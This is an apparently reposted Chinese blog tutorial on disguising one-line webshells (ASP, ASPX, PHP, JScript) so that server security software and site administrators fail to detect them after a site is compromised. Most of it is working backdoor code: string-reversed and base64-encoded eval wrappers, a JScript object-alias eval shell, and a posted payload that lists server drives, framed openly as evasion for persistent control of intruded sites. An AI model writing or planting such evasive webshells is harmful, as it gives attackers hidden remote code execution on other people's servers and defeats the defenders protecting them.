.一句话.的艺术——简单的编码和变形绕过检测

0x00 背景


话说现在针对Web端文件代码检测的服务器安全类软件已经非常普及了,常见的有阿D保护盾、安全狗、护卫神、360网站卫士。它们所拥有的功能也大致相同,如:

+---------------------㈠----------------------+  
|① 检查SQL注入                                |  
|② 检查XSS代码                                |  
|③ 检查网站中有危险代码的文件                    |  
|④ 数据库权限管理、风险行为检查                  |  
+---------------------㈡----------------------+  
|⑤ 网站流量监控                               |  
|⑥ 网站日志管理                               |  
|⑦ 系统进程管理                               |  
|⑧ 端口状态查看                               |  
|⑨ 系统账号、特殊位置文件检查                   |  
|⑩ 防御ddos、cc攻击                           |  
|   ……                                       |  
+-------------------------------------------+  

可以将这些功能按下面进行分类:

                                    +----(检测Get内容)  
                                    |  
                 +----(未入侵)-------|----(检测Post内容)  
                 |                  |  
                 |                  +----(检测Http请求头、请求频率等)  
安全类软件--|  
                 |                  +----(日志审查分析)  
                 |                  |  
                 +----(已入侵)-------|----(后门检测清除)  
                                    |  
                                    +----(系统安全加固)

本文所针对的情况是:在已取得Webshell(一句话)[为什么不是大马呢,因为大马被杀的机率更高]的情况下绕过网站安全类软件的检测成功执行任意代码。

0x01 技术细节


要让“一句话”可以接收代码、执行代码、返回结果,首先要具备的条件是“一句话”已经通过检查。好吧,少说废话,开始行动吧!

已准备工具:

D盾_Web查杀(D盾杀的Shell比较全)

ASP、ASPX、PHP原生态无污染一句话

<%eval request("z")%>;
<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>;
<?php @eval($_POST['z']);?>

来看一下D盾对原生一句话的查杀情况吧!

.一句话.的艺术——简单的编码和变形绕过检测

Shit!,级别为5(eval后门)全部杀掉!这样也就是说即使你的一句话已经躺在目标网站目录了,访问的时候也会被WAF断掉连接。这样一句话本身也就失去意义了,更别说去使用它了。

那么这种情况下该怎么做呢?我的答案是:就像Windows下做exe的免杀一样,找到杀软件杀掉的特征码然后改掉或是绕过。当然免杀Shell比免杀exe简单的多了……

开始对我们的一句话做“免杀”吧!在此之前先来了解一句话木马的原理。对比下asp、aspx、php一句话,你发现了什么?

.一句话.的艺术——简单的编码和变形绕过检测

看到了吧,不同语言的一句话构成几乎完全一致!(首先请求客户端数据,然后执行请求到的数据)至于执行数据的来源,可以是Post,也可以是Get、cookies、session等(依然是Post、Get);如果考虑到数据长度、编码、隐蔽性等诸多因素当然还是使用Post方法最为合适。

那么服务器安全类软件杀的究竟是什么东东呢?前面说过了:“特征”,我们来做如下测试:

.一句话.的艺术——简单的编码和变形绕过检测

我把Request/POST前随便加了一个字符,再扫一扫,结果如上图。可见安全类软件杀掉的不是eval(execute/executeglobal/assert……),而是eval+”请求数据”。当脚本内有eval字串时仅仅只是提醒而已(如果连执行函数都杀,那“上帝”造它干吗!)。但是上图中的三个脚本没一个是可以正常执行的,哪有srequest呢!

这样我们就没招了吗?答案是否定的!我们可以用这样的方式来绕一绕:[exec decoding(excoding)]=》伪代码。其中excoding为已经编码了的原生一句话。encode和decode函数自己创造吧……

经过一番功夫,我把Shell代码改造如下(当然如下代码都不是最好的,因为我有点懒):

ASP:

#!php
<%
Function MorfiCode(Code)
    MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"/*/",vbCrlf)
End Function
Execute MorfiCode(")/*/z/*/(tseuqer lave")
%>

ASPX:

#!php
<script runat="server" language="Jscript">
function popup(str){
    var q = "u";
    var w = "afe";
    var a = q + "ns" + w;
    var b = eval(str,a);
    return(b);
}
</script>
<%
popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));
%>

PHP

#!php
<?php
$mujj = $_POST['z'];
if($mujj!="")
{
    $xsser = base64_decode($_POST['z0']);
    @eval("/$safedg = $xsser;")
}
?>

效果呢,如下图:

.一句话.的艺术——简单的编码和变形绕过检测

实测至此与Shell的连接已经不会被断了,而且以上三个一句话都支持我们亲爱的“菜刀”连接。但实际上你用菜刀是连不上的,因为安全类软件还会检测Get、Post、Cookies……的内容,菜刀Post数据包中含有太多的关键字(execute、response.write,base64_decode…… 不信你截包看一看)。这样有什么方法来突破呢?哈哈,两种方法:

一、反汇编改造“菜刀”(依然会有特征)       详见:http://zone.wooyun.org/content/8169 二、自己写个“菜刀”(可完全没有任何特征)   详见:http://zone.wooyun.org/content/8137

                    代码自定义编码后发送  
菜刀(客户端)《================================》一句话(服务端)  
                   解码后执行返回(编码)数据

现在,我们已经可以使用“菜刀”管理有网站安全类软件的站点了,可美中不足的是依然会被提示Execute/eval/base64_decode加密。因为正常情况下很少有用到eval/execute/executeglobal……函数(有经验的管理直接搜索eval、execute、assert等,见到包含在<%%>、就删……),那该怎么办才能忽悠住管理员让他保留我们的Shell呢?当然有答案,你可以构造一个注入或是文件上传,用到的时候再搞上自己的Shell,但我的目标是让我的一句话极具迷惑性(狗、神、盾、卫士哥不杀;管理员看不出这是一句话)。

在这种情况下,可能要面临一个艰难的决定:放弃我们的“菜刀”,客户端全部自写。把eval等关键代码全部写到标签内,因为安全类软件对标签内代码的检测较宽松,对<%%>、<?php ?>等脚本标记内代码的正则检测较为严格。像<SCRIPT language=VBScript runat=”server”>代码</SCRIPT>这样的之前可以用来完美“免杀”现在已经不行了,但我们还有JScript呀!所以我采用了冰狐:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(‘#’)+”)</SCRIPT>,重点对其进行改造!谁会注意LANGUAGE=JAVASCRIPT呢?

经过一番改造,最终代码如下:

<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT> var P = Request.form('z'); var Wab = {'E' : eval}; Wab.E(P+''); </SCRIPT>

看一下效果吧……

.一句话.的艺术——简单的编码和变形绕过检测

D盾已经没有任何提示了!那么该怎么用这个一句话呢?已经说过了无法使用“菜刀连接”。好吧,火狐中选post一段代码到这个一句话试试……

.一句话.的艺术——简单的编码和变形绕过检测

当然不仅限于显示网站路径,任意代码哦!试试:

try{var S="->|"+Server.Mappath("/")+"/t";var oFso = Server.CreateObject("Scripting.FileSystemObject");var oDrivers = oFso.Drives;for(var x=new Enumerator(oDrivers);!x.atEnd();x.moveNext()) {var oDriver = x.item();S+=oDriver.Path;}S+="|<-";Response.write(S);}catch(e){}

.一句话.的艺术——简单的编码和变形绕过检测

这个一句话已经满足我们的所有要求了,但是你会说它依然不完美,因为它不支持Chopper!好吧,那就再费心改造一下吧…… 经过改造后的Shell代码如下:

<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>
    var Sp = Request.form('z');
    var Fla = {'E' : eval};
    var St=""
    var A="XX代码";
    var B="XX代码";
    var C="XXXXXX"; ……
    switch(Sp) { case "A": St=A; break; case "B": St=B; break; case "C": St=C; break; case "D": St=D; case "E": St=E; break; …… default:} Fla.E(St+'');
</SCRIPT> 

这样就可以使用“菜刀”连接了(我省略了代码,精简了重点部分上面只是个示例。)

好吧,ASP一句话到这已经玩的很开心了,那接下来说下ASPX、PHP吧,是这样的,我不懂.net编程,也不懂PHP编程。自己顶多也就算是个无证&业余程序猿,所以从这往下所述的您能看就看,不能看就使劲吐槽!!!!!

总的来说上面的ASPX一句话已经够玩了,但是如果您是个追求完美的人,您可以将您的代码编译入Dll,然后放入bin目录(lake2 N年前不就这么做了吗:WebAdmin 2.Y详见:http://blog.csdn.net/lake2/article/details/575602),dll中的代码用记事本能看吗!更别提杀了……

最后来说一下PHP吧,变形方法和ASP、ASPX的没什么两样。您可以将代码写入<script language=php>标签内以增大迷惑性,但这一招和ASP的vbscript一样对于安全类软件早已经失效,没说它们视如所以呢,看实际情况和使用的地方了,自己选择。

通过简单的变量传递便可以实现免杀(php语法真的好灵活,能免的连个毛都不剩下)……
我使用如下代码作为一句话:

#!php
<?php
$x=$_POST['z'];
@eval("/$safedg = $x;");  
?>

当然您不满意的话可以继续搞,连eval都给拆了!使用preg_replace、array_map或是从REQUEST的变量中取得eval、assert……,实没D盾都会有不同等级的报告(提示可疑但不认识,毕竟这些不常用函数都挺有风险……),我是挺懒,不想搞了……
看效果:

.一句话.的艺术——简单的编码和变形绕过检测

关于如何玩转一句话已经写的差不多了(本人水平问题ASPX、PHP未能写的更详细!以后补充……)。如果将来一句话因为关键字被杀实再玩不鸟了(可能性不太大),那就转业自写Customize脚本吧,至少文件读写,数据库连接这些功能是不会被杀的。

参考:

http://qqhack8.blog.163.com/blog/static/114147985201211292209893/

http://hi.baidu.com/monyer/item/a218dbadf2afc7a828ce9d63

原创文章,作者:Maggie-Hunter,如若转载,请注明出处:https://blog.ytso.com/56106.html

(0)
上一篇 2021年8月7日
下一篇 2021年8月7日

相关推荐

发表回复

登录后才能评论